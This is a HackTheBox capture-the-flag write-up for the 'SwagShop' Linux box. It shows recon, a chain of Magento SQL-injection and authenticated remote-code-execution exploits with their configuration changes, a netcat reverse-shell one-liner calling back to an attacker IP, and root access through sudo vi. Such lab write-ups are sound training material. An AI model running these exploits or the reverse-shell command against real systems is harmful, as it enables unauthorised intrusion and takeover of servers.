SwagShop

An easy Linux box from HackTheBox, use a chain of two CVEs on Magento to get initial access, then abuse sudo privileges on vi to get root.

Recon

Running the usual nmap

georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.140


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6552bd24e8fa3817261379a12f624ec (RSA)
|   256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_  256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not much to see at all, start a nmap on all ports in the background while we look at the webapp

georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -T4 -p- -o nmap/allports 10.10.10.140

Dont get any response from the webapp, besides the URL being changed to “swagshop.htb”, so add that to /etc/hosts and navigate to http://swagshop.htb

And see a Magento store, the version seemingly from 2014 by the footer

Google around for a Magento scanner, and come up on this one

Git clone it, and download the .phar file

georgy@pop-os:~/Documents/htb/swagshop$ php magescan.phar scan:all swagshop.htb

+-----------+------------------+
| Parameter | Value            |
+-----------+------------------+
| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+

Don’t get much useful info besides the version, so google around for 1.9.0.0 and 1.9.0.1 Magento exploits

Come across this exploit and git clone it into the working directory

Exploitation

Inside the exploit have to modify it a little bit to get it to work

The exploit works as a SQL injection on the admin login form, to create a new admin user

Naturally, this means that the URL must be that of the admin page, so change

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

target_url = target + "/index.php/admin/"

And run it with

georgy@pop-os:~/Documents/htb/swagshop/Magento-Shoplift-SQLI$ python2.7 poc.py swagshop.htb
WORKED
Check http://swagshop.htb/admin with creds ypwq:123

So then we get an admin login to Magento, but this alone doesn’t get us code exec on the box

Running a quick searchsploit on Magento to see if I missed a true RCE

georgy@pop-os:~/Documents/htb/swagshop$ searchsploit magento

...
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
....

Now that we have admin creds, maybe we can chain it with this exploit?

Looking at it, will have to change a few things, notably changing the values of the commented “Config” section of the exploit

This exploit also utilises the admin login, so will have to use the URL with the admin login when running it

# Config.
username = 'ypwq'
password = '123'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

Change the username and password to the output of the first exploit, but for the install date will need to use the date inside /app/etc/local.xml

Can use curl for this

curl -s http://swagshop.htb/app/etc/local.xml | grep date

<date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>

And paste the date in like above

Now run the exploit with

georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "whoami"
www-data

And have code exec! Now to upgrade to a reverse shell can use a bash reverse shell, and start a listener on 8888

georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"

And catch the shell

Connection received on 10.10.10.140 43202
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

And upgrade the terminal with the usual python3 pty

$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@swagshop:/var/www/html$ export TERM=xterm

CTRL+Z

georgy@pop-os:~/Documents/htb/swagshop$ stty raw -echo;fg

Doing basic enumeration, see that www-data can run vi with sudo as root

www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

So lets do just that

www-data@swagshop:/var/www/html$ sudo -u root /usr/bin/vi /var/www/html/root

Then inside of vi, can start a shell by using “:!/bin/sh”

And get a shell as root!

# whoami
root
#

SwagShop

Recon #

Exploitation #

Recon

Exploitation